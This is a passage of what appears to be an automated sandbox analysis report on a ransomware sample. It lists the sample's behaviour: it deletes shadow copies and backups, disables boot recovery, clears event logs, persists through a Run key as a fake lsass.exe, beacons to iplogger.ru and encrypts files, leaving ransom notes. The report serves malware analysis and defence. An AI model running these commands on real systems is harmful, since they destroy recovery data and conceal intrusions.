660 "command": "\"C:\\Windows\\system32\\cmd.exe\" /C wmic shadowcopy delete"
661
662
663 "command": "\"C:\\Windows\\system32\\cmd.exe\" /C wmic shadowcopy delete"
664
665
666 "command": "\"C:\\Windows\\system32\\cmd.exe\" /C vssadmin delete shadows /all /quiet"
667
668
669 "command": "\"C:\\Windows\\system32\\cmd.exe\" /C reg delete \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Default\" /va /f"
670
671
672 "command": "\"C:\\Windows\\system32\\cmd.exe\" /C reg delete \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Default\" /va /f"
673
674
675 "command": "\"C:\\Windows\\system32\\cmd.exe\" /C reg delete \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Default\" /va /f"
676
677
678 "command": "\"C:\\Windows\\system32\\cmd.exe\" /C reg delete \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Servers\" /f"
679
680
681 "command": "\"C:\\Windows\\system32\\cmd.exe\" /C reg delete \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Servers\" /f"
682
683
684 "command": "\"C:\\Windows\\system32\\cmd.exe\" /C reg delete \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Servers\" /f"
685
686
687 "command": "\"C:\\Windows\\system32\\cmd.exe\" /C reg add \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Servers\""
688
689
690 "command": "\"C:\\Windows\\system32\\cmd.exe\" /C reg add \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Servers\""
691
692
693 "command": "\"C:\\Windows\\system32\\cmd.exe\" /C reg add \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Servers\""
694
695
696 "command": "\"C:\\Windows\\system32\\cmd.exe\" /C attrib \"%userprofile%\\documents\\Default.rdp\" -s -h"
697
698
699 "command": "\"C:\\Windows\\system32\\cmd.exe\" /C attrib \"%userprofile%\\documents\\Default.rdp\" -s -h"
700
701
702 "command": "\"C:\\Windows\\system32\\cmd.exe\" /C del \"%userprofile%\\documents\\Default.rdp\""
703
704
705 "command": "\"C:\\Windows\\system32\\cmd.exe\" /C wevtutil.exe clear-log Application"
706
707
708 "command": "\"C:\\Windows\\system32\\cmd.exe\" /C wevtutil.exe clear-log Security"
709
710
711 "command": "\"C:\\Windows\\system32\\cmd.exe\" /C wevtutil.exe clear-log System"
712
713
714 "command": "\"C:\\Windows\\system32\\cmd.exe\" /C sc config eventlog start=disabled"
715
716
717 "command": "\"C:\\Windows\\system32\\cmd.exe\" /C sc config eventlog start=disabled"
718
719
720 "command": "C:\\Windows\\system32\\PING.EXE ping -n 3 127.1"
721
722
723 "command": "C:\\Windows\\System32\\Wbem\\WMIC.exe wmic shadowcopy delete"
724
725
726 "command": "C:\\Windows\\System32\\Wbem\\WMIC.exe wmic shadowcopy delete"
727
728
729 "command": "reg delete \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Default\" /va /f"
730
731
732 "command": "reg delete \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Default\" /va /f"
733
734
735 "command": "reg delete \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Servers\" /f"
736
737
738 "command": "reg delete \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Servers\" /f"
739
740
741 "command": "reg add \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Servers\""
742
743
744 "command": "reg add \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Servers\""
745
746
747 "command": "attrib \"C:\\Users\\user\\documents\\Default.rdp\" -s -h"
748
749
750 "command": "sc config eventlog start=disabled"
751
752
753 "command": "\"C:\\Program Files\\Common Files\\Microsoft Shared\\Office15\\OLicenseHeartbeat.exe\""
754
755
756
757
758 "Description": "Attempts to delete volume shadow copies",
759 "Details":
760
761
762 "Description": "Deletes its original binary from disk",
763 "Details":
764
765
766 "Description": "Modifies boot configuration settings",
767 "Details":
768
769 "disables_system_recovery": "Modifies the boot configuration to disable startup recovery"
770
771
772 "ignorefailures": "Modifies the boot configuration to disable Windows error recovery"
773
774
775
776
777 "Description": "A system process is generating network traffic likely as a result of process injection",
778 "Details":
779
780 "http_request": "lsass.exe_InternetConnectA_iplogger.ru"
781
782
783 "http_request_path": "lsass.exe_HttpOpenRequestA_1Oh8E.jpeg"
784
785
786
787
788 "Description": "Installs itself for autorun at Windows startup",
789 "Details":
790
791 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Local Security Authority Subsystem Service"
792
793
794 "data": "\"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\lsass.exe\" -start"
795
796
797
798
799 "Description": "Exhibits possible ransomware file modification behavior",
800 "Details":
801
802 "file_modifications": "Performs 146 file moves indicative of a potential file encryption process"
803
804
805 "drops_unknown_mimetypes": "Drops 159 unknown file mime types which may be indicative of encrypted files being written back to disk"
806
807
808
809
810 "Description": "Writes a potential ransom message to disk",
811 "Details":
812
813 "ransom_file": "!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT"
814
815
816
817
818 "Description": "Stack pivoting was detected when using a critical API",
819 "Details":
820
821 "process": "taskeng.exe:2584"
822
823
824 "process": "taskeng.exe:1604"
825
826
827
828
829 "Description": "File has been identified by 15 Antiviruses on VirusTotal as malicious",
830 "Details":
831
832 "Cylance": "Unsafe"
833
834
835 "CrowdStrike": "win/malicious_confidence_100% (D)"
836
837
838 "Symantec": "ML.Attribute.HighConfidence"
839
840
841 "APEX": "Malicious"
842
843
844 "Endgame": "malicious (high confidence)"
845
846
847 "Invincea": "heuristic"
848
849
850 "McAfee-GW-Edition": "BehavesLike.Win32.PWSQQPass.gh"
851
852
853 "FireEye": "Generic.mg.636d3c669e36510b"
854
855
856 "SentinelOne": "DFI - Malicious PE"
857
858
859 "Microsoft": "Trojan:Win32/Suloc.A"
860
861
862 "Acronis": "suspicious"
863
864
865 "VBA32": "Malware-Cryptor.General.3"
866
867
868 "Rising": "Trojan.Generic@ML.100 (RDML:kwEnH7CqjV0yUM4V3OzqNQ)"
869
870
871 "Cybereason": "malicious.5d1a74"
872
873
874 "Qihoo-360": "HEUR/QVM19.1.F7E7.Malware.Gen"
875
876
877
878
879 "Description": "Detects VirtualBox through the presence of a file",
880 "Details":
881
882 "file": "C:\\Program Files\\BLAOracle\\VirtualBox Guest Additions\\VBoxGuest.cat"
883
884
885 "file": "C:\\Program Files\\BLAOracle\\VirtualBox Guest Additions\\VBoxGuest.inf"
886
887
888 "file": "C:\\Program Files\\BLAOracle\\VirtualBox Guest Additions\\VBoxMouse.inf"
889
890
891 "file": "C:\\Program Files\\BLAOracle\\VirtualBox Guest Additions\\VBoxMouse.cat"
892
893
894 "file": "C:\\Program Files\\BLAOracle\\VirtualBox Guest Additions\\VBoxVideo.inf"
895
896
897 "file": "C:\\Program Files\\BLAOracle\\VirtualBox Guest Additions\\VBoxVideo.cat"
898
899
900
901
902 "Description": "Clears Windows events or logs",
903 "Details":
904
905 "command": "\"C:\\Windows\\system32\\cmd.exe\" /C wevtutil.exe clear-log Application"
906
907
908 "command": "\"C:\\Windows\\system32\\cmd.exe\" /C wevtutil.exe clear-log Security"
909
910
911 "command": "\"C:\\Windows\\system32\\cmd.exe\" /C wevtutil.exe clear-log System"
912
913
914 "command": "wevtutil.exe clear-log Application"
915
916
917 "command": "wevtutil.exe clear-log Security"
918
919
920 "command": "wevtutil.exe clear-log System"
921
922
923
924
925 "Description": "Appears to use character obfuscation in a command line",
926 "Details":
927
928 "command": "\"C:\\Windows\\system32\\cmd.exe\" /e:on /c md \"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\" & copy \"C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe\" \"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\lsass.exe\" & reg add \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" /V \"Local Security Authority Subsystem Service\" /t REG_SZ /F /D \"\\\"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\lsass.exe\\\" -start\""
929
930
931
932
933 "Description": "Creates a copy of itself",
934 "Details":
935
936 "copy": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\lsass.exe"
937
938
939
940
941 "Description": "Drops a binary and executes it",
942 "Details":
943
944 "binary": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\lsass.exe"
945
946
947
948
949 "Description": "Anomalous binary characteristics",
950 "Details":
951
952 "anomaly": "Found duplicated section names"
953
954
955
956
957 "Description": "Uses suspicious command line tools or Windows utilities",
958 "Details":
959
960 "command": "\"C:\\Windows\\system32\\cmd.exe\" /c for /l %x in (1,1,999) do ( ping -n 3 127.1 & del \"C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe\" & if not exist \"C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe\" exit )"
961
962
963 "command": "C:\\Windows\\System32\\cmd.exe /c for /l %x in (1,1,999) do ( ping -n 3 127.1 & del \"C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe\" & if not exist \"C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe\" exit )"
964
965
966 "command": "\"C:\\Windows\\system32\\cmd.exe\" /C bcdedit /set default bootstatuspolicy ignoreallfailures"
967
968
969 "command": "\"C:\\Windows\\system32\\cmd.exe\" /C bcdedit /set default recoveryenabled no"
970
971
972 "command": "\"C:\\Windows\\system32\\cmd.exe\" /C wbadmin delete catalog -quiet"
973
974
975 "command": "\"C:\\Windows\\system32\\cmd.exe\" /C wbadmin delete systemstatebackup"
976
977
978 "command": "\"C:\\Windows\\system32\\cmd.exe\" /C wbadmin delete systemstatebackup -keepversions:0"
979
980
981 "command": "\"C:\\Windows\\system32\\cmd.exe\" /C wbadmin delete backup"
982
983
984 "command": "\"C:\\Windows\\system32\\cmd.exe\" /C vssadmin delete shadows /all /quiet"
985
986
987 "command": "\"C:\\Windows\\system32\\cmd.exe\" /C del \"%userprofile%\\documents\\Default.rdp\""
988
989
990 "command": "\"C:\\Windows\\system32\\cmd.exe\" /C wevtutil.exe clear-log Application"
991
992
993 "command": "\"C:\\Windows\\system32\\cmd.exe\" /C wevtutil.exe clear-log Security"
994
995
996 "command": "\"C:\\Windows\\system32\\cmd.exe\" /C wevtutil.exe clear-log System"
997
998
999 "command": "vssadmin delete shadows /all /quiet"
1000
1001
1002 "command": "wevtutil.exe clear-log Application"
1003
1004
1005 "command": "wevtutil.exe clear-log Security"
1006
1007
1008 "command": "wevtutil.exe clear-log System"
1009
1010
1011
1012
1013
1014* Started Service:
1015
1016* Mutexes:
1017 "Global\\ADAP_WMI_ENTRY",
1018 "Global\\RefreshRA_Mutex",
1019 "Global\\RefreshRA_Mutex_Lib",
1020 "Global\\RefreshRA_Mutex_Flag"
1021
1022
1023* Modified Files:
1024 "C:\\Users\\user\\AppData\\Local\\Temp\\344AA25B.buran",
1025 "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\lsass.exe",
1026 "C:\\Users\\user\\AppData\\Local\\Temp\\4500E6C1.buran",
1027 "\\??\\PIPE\\wkssvc",
1028 "\\Device\\LanmanDatagramReceiver",
1029 "\\??\\PIPE\\DAV RPC SERVICE",
1030 "C:\\Windows\\appcompat\\Programs\\RecentFileCache.bcf",
1031 "C:\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb",
1032 "C:\\Windows\\SoftwareDistribution\\DataStore\\Logs\\edb.chk",
1033 "\\??\\pipe\\PIPE_EVENTROOT\\CIMV2PROVIDERSUBSYSTEM",
1034 "\\??\\PIPE\\samr",
1035 "C:\\.doc",
1036 "C:\\.doc.875B149F-7E2C-F9D8-914C-24C48737255D",
1037 "C:\\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT",
1038 "C:\\.htm",
1039 "C:\\.htm.875B149F-7E2C-F9D8-914C-24C48737255D",
1040 "C:\\.jpeg",
1041 "C:\\.jpeg.875B149F-7E2C-F9D8-914C-24C48737255D",
1042 "C:\\.jpg",
1043 "C:\\.jpg.875B149F-7E2C-F9D8-914C-24C48737255D",
1044 "C:\\.pptx",
1045 "C:\\.pptx.875B149F-7E2C-F9D8-914C-24C48737255D",
1046 "C:\\.txt",
1047 "C:\\.txt.875B149F-7E2C-F9D8-914C-24C48737255D",
1048 "C:\\.xls",
1049 "C:\\.xls.875B149F-7E2C-F9D8-914C-24C48737255D",
1050 "C:\\.zip",
1051 "C:\\Host.bmp",
1052 "C:\\Host.bmp.875B149F-7E2C-F9D8-914C-24C48737255D",
1053 "C:\\Host.docx",
1054 "C:\\Host.docx.875B149F-7E2C-F9D8-914C-24C48737255D",
1055 "C:\\Host.html",
1056 "C:\\Host.html.875B149F-7E2C-F9D8-914C-24C48737255D",
1057 "C:\\Host.jpeg",
1058 "C:\\Host.jpeg.875B149F-7E2C-F9D8-914C-24C48737255D",
1059 "C:\\Host.jpg",
1060 "C:\\Host.jpg.875B149F-7E2C-F9D8-914C-24C48737255D",
1061 "C:\\Host.pdf",
1062 "C:\\Host.pdf.875B149F-7E2C-F9D8-914C-24C48737255D",
1063 "C:\\Program Files\\BLAOracle\\VirtualBox Guest Additions\\iexplore.ico",
1064 "C:\\Program Files\\BLAOracle\\VirtualBox Guest Additions\\iexplore.ico.875B149F-7E2C-F9D8-914C-24C48737255D",
1065 "C:\\Program Files\\BLAOracle\\VirtualBox Guest Additions\\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT",
1066 "C:\\Program Files\\BLAOracle\\VirtualBox Guest Additions\\Oracle VM VirtualBox Guest Additions.url",
1067 "C:\\Program Files\\BLAOracle\\VirtualBox Guest Additions\\Oracle VM VirtualBox Guest Additions.url.875B149F-7E2C-F9D8-914C-24C48737255D",
1068 "C:\\Program Files\\BLAOracle\\VirtualBox Guest Additions\\VBoxGuest.cat",
1069 "C:\\Program Files\\BLAOracle\\VirtualBox Guest Additions\\VBoxGuest.cat.875B149F-7E2C-F9D8-914C-24C48737255D",
1070 "C:\\Program Files\\BLAOracle\\VirtualBox Guest Additions\\VBoxGuest.inf",
1071 "C:\\Program Files\\BLAOracle\\VirtualBox Guest Additions\\VBoxGuest.inf.875B149F-7E2C-F9D8-914C-24C48737255D",
1072 "C:\\Program Files\\BLAOracle\\VirtualBox Guest Additions\\VBoxMouse.cat",
1073 "C:\\Program Files\\BLAOracle\\VirtualBox Guest Additions\\VBoxMouse.cat.875B149F-7E2C-F9D8-914C-24C48737255D",
1074 "C:\\Program Files\\BLAOracle\\VirtualBox Guest Additions\\VBoxMouse.inf",
1075 "C:\\Program Files\\BLAOracle\\VirtualBox Guest Additions\\VBoxMouse.inf.875B149F-7E2C-F9D8-914C-24C48737255D",
1076 "C:\\Program Files\\BLAOracle\\VirtualBox Guest Additions\\VBoxVideo.cat",
1077 "C:\\Program Files\\BLAOracle\\VirtualBox Guest Additions\\VBoxVideo.cat.875B149F-7E2C-F9D8-914C-24C48737255D",
1078 "C:\\Program Files\\BLAOracle\\VirtualBox Guest Additions\\VBoxVideo.inf",
1079 "C:\\Program Files\\BLAOracle\\VirtualBox Guest Additions\\VBoxVideo.inf.875B149F-7E2C-F9D8-914C-24C48737255D",
1080 "C:\\Program Files\\Java\\jre1.8.0_201\\COPYRIGHT",
1081 "C:\\Program Files\\Java\\jre1.8.0_201\\COPYRIGHT.875B149F-7E2C-F9D8-914C-24C48737255D",
1082 "C:\\Program Files\\Java\\jre1.8.0_201\\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT",
1083 "C:\\Program Files\\Java\\jre1.8.0_201\\LICENSE",
1084 "C:\\Program Files\\Java\\jre1.8.0_201\\LICENSE.875B149F-7E2C-F9D8-914C-24C48737255D",
1085 "C:\\Program Files\\Java\\jre1.8.0_201\\README.txt",
1086 "C:\\Program Files\\Java\\jre1.8.0_201\\README.txt.875B149F-7E2C-F9D8-914C-24C48737255D",
1087 "C:\\Program Files\\Java\\jre1.8.0_201\\release",
1088 "C:\\Program Files\\Java\\jre1.8.0_201\\release.875B149F-7E2C-F9D8-914C-24C48737255D",
1089 "C:\\Program Files\\Java\\jre1.8.0_201\\THIRDPARTYLICENSEREADME-JAVAFX.txt",
1090 "C:\\Program Files\\Java\\jre1.8.0_201\\THIRDPARTYLICENSEREADME-JAVAFX.txt.875B149F-7E2C-F9D8-914C-24C48737255D",
1091 "C:\\Program Files\\Java\\jre1.8.0_201\\THIRDPARTYLICENSEREADME.txt",
1092 "C:\\Program Files\\Java\\jre1.8.0_201\\THIRDPARTYLICENSEREADME.txt.875B149F-7E2C-F9D8-914C-24C48737255D",
1093 "C:\\Program Files\\Java\\jre1.8.0_201\\Welcome.html",
1094 "C:\\Program Files\\Java\\jre1.8.0_201\\Welcome.html.875B149F-7E2C-F9D8-914C-24C48737255D",
1095 "C:\\Program Files\\Java\\jre1.8.0_201\\bin\\server\\classes.jsa",
1096 "C:\\Program Files\\Java\\jre1.8.0_201\\bin\\server\\classes.jsa.875B149F-7E2C-F9D8-914C-24C48737255D",
1097 "C:\\Program Files\\Java\\jre1.8.0_201\\bin\\server\\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT",
1098 "C:\\Program Files\\Java\\jre1.8.0_201\\bin\\server\\Xusage.txt",
1099 "C:\\Program Files\\Java\\jre1.8.0_201\\bin\\server\\Xusage.txt.875B149F-7E2C-F9D8-914C-24C48737255D",
1100 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\accessibility.properties",
1101 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\accessibility.properties.875B149F-7E2C-F9D8-914C-24C48737255D",
1102 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT",
1103 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\calendars.properties",
1104 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\calendars.properties.875B149F-7E2C-F9D8-914C-24C48737255D",
1105 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\charsets.jar",
1106 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\charsets.jar.875B149F-7E2C-F9D8-914C-24C48737255D",
1107 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\classlist",
1108 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\classlist.875B149F-7E2C-F9D8-914C-24C48737255D",
1109 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\content-types.properties",
1110 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\content-types.properties.875B149F-7E2C-F9D8-914C-24C48737255D",
1111 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\currency.data",
1112 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\currency.data.875B149F-7E2C-F9D8-914C-24C48737255D",
1113 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\deploy.jar",
1114 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\deploy.jar.875B149F-7E2C-F9D8-914C-24C48737255D",
1115 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\flavormap.properties",
1116 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\flavormap.properties.875B149F-7E2C-F9D8-914C-24C48737255D",
1117 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\fontconfig.bfc",
1118 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\fontconfig.bfc.875B149F-7E2C-F9D8-914C-24C48737255D",
1119 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\fontconfig.properties.src",
1120 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\fontconfig.properties.src.875B149F-7E2C-F9D8-914C-24C48737255D",
1121 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\hijrah-config-umalqura.properties",
1122 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\hijrah-config-umalqura.properties.875B149F-7E2C-F9D8-914C-24C48737255D",
1123 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\javafx.properties",
1124 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\javafx.properties.875B149F-7E2C-F9D8-914C-24C48737255D",
1125 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\javaws.jar",
1126 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\javaws.jar.875B149F-7E2C-F9D8-914C-24C48737255D",
1127 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\jce.jar",
1128 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\jce.jar.875B149F-7E2C-F9D8-914C-24C48737255D",
1129 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\jfr.jar",
1130 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\jfr.jar.875B149F-7E2C-F9D8-914C-24C48737255D",
1131 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\jfxswt.jar",
1132 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\jfxswt.jar.875B149F-7E2C-F9D8-914C-24C48737255D",
1133 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\jsse.jar",
1134 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\jsse.jar.875B149F-7E2C-F9D8-914C-24C48737255D",
1135 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\jvm.hprof.txt",
1136 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\jvm.hprof.txt.875B149F-7E2C-F9D8-914C-24C48737255D",
1137 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\logging.properties",
1138 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\logging.properties.875B149F-7E2C-F9D8-914C-24C48737255D",
1139 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\management-agent.jar",
1140 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\management-agent.jar.875B149F-7E2C-F9D8-914C-24C48737255D",
1141 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\meta-index",
1142 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\meta-index.875B149F-7E2C-F9D8-914C-24C48737255D",
1143 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\net.properties",
1144 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\net.properties.875B149F-7E2C-F9D8-914C-24C48737255D",
1145 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\plugin.jar",
1146 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\plugin.jar.875B149F-7E2C-F9D8-914C-24C48737255D",
1147 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\psfont.properties.ja",
1148 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\psfont.properties.ja.875B149F-7E2C-F9D8-914C-24C48737255D",
1149 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\psfontj2d.properties",
1150 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\psfontj2d.properties.875B149F-7E2C-F9D8-914C-24C48737255D",
1151 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\resources.jar",
1152 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\resources.jar.875B149F-7E2C-F9D8-914C-24C48737255D",
1153 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\rt.jar",
1154 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\rt.jar.875B149F-7E2C-F9D8-914C-24C48737255D",
1155 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\sound.properties",
1156 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\sound.properties.875B149F-7E2C-F9D8-914C-24C48737255D",
1157 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\tzdb.dat",
1158 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\tzdb.dat.875B149F-7E2C-F9D8-914C-24C48737255D",
1159 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\tzmappings",
1160 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\tzmappings.875B149F-7E2C-F9D8-914C-24C48737255D",
1161 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\amd64\\jvm.cfg",
1162 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\amd64\\jvm.cfg.875B149F-7E2C-F9D8-914C-24C48737255D",
1163 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\amd64\\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT",
1164 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\cmm\\CIEXYZ.pf",
1165 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\cmm\\CIEXYZ.pf.875B149F-7E2C-F9D8-914C-24C48737255D",
1166 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\cmm\\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT",
1167 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\cmm\\GRAY.pf",
1168 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\cmm\\GRAY.pf.875B149F-7E2C-F9D8-914C-24C48737255D",
1169 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\cmm\\LINEAR_RGB.pf",
1170 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\cmm\\LINEAR_RGB.pf.875B149F-7E2C-F9D8-914C-24C48737255D",
1171 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\cmm\\PYCC.pf",
1172 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\cmm\\PYCC.pf.875B149F-7E2C-F9D8-914C-24C48737255D",
1173 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\cmm\\sRGB.pf",
1174 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\cmm\\sRGB.pf.875B149F-7E2C-F9D8-914C-24C48737255D",
1175 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\deploy\\ffjcext.zip",
1176 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\deploy\\ffjcext.zip.875B149F-7E2C-F9D8-914C-24C48737255D",
1177 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\deploy\\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT",
1178 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\deploy\\messages.properties",
1179 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\deploy\\messages.properties.875B149F-7E2C-F9D8-914C-24C48737255D",
1180 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\deploy\\messages_de.properties",
1181 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\deploy\\messages_de.properties.875B149F-7E2C-F9D8-914C-24C48737255D",
1182 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\deploy\\messages_es.properties",
1183 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\deploy\\messages_es.properties.875B149F-7E2C-F9D8-914C-24C48737255D",
1184 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\deploy\\messages_fr.properties",
1185 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\deploy\\messages_fr.properties.875B149F-7E2C-F9D8-914C-24C48737255D",
1186 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\deploy\\messages_it.properties",
1187 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\deploy\\messages_it.properties.875B149F-7E2C-F9D8-914C-24C48737255D",
1188 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\deploy\\messages_ja.properties",
1189 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\deploy\\messages_ja.properties.875B149F-7E2C-F9D8-914C-24C48737255D",
1190 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\deploy\\messages_ko.properties",
1191 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\deploy\\messages_ko.properties.875B149F-7E2C-F9D8-914C-24C48737255D",
1192 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\deploy\\messages_pt_BR.properties",
1193 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\deploy\\messages_pt_BR.properties.875B149F-7E2C-F9D8-914C-24C48737255D",
1194 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\deploy\\messages_sv.properties",
1195 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\deploy\\messages_sv.properties.875B149F-7E2C-F9D8-914C-24C48737255D",
1196 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\deploy\\messages_zh_CN.properties",
1197 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\deploy\\messages_zh_CN.properties.875B149F-7E2C-F9D8-914C-24C48737255D",
1198 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\deploy\\messages_zh_HK.properties",
1199 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\deploy\\messages_zh_HK.properties.875B149F-7E2C-F9D8-914C-24C48737255D",
1200 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\deploy\\messages_zh_TW.properties",
1201 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\deploy\\messages_zh_TW.properties.875B149F-7E2C-F9D8-914C-24C48737255D",
1202 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\deploy\\splash.gif",
1203 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\deploy\\splash.gif.875B149F-7E2C-F9D8-914C-24C48737255D",
1204 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\deploy\\splash@2x.gif",
1205 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\deploy\\splash@2x.gif.875B149F-7E2C-F9D8-914C-24C48737255D",
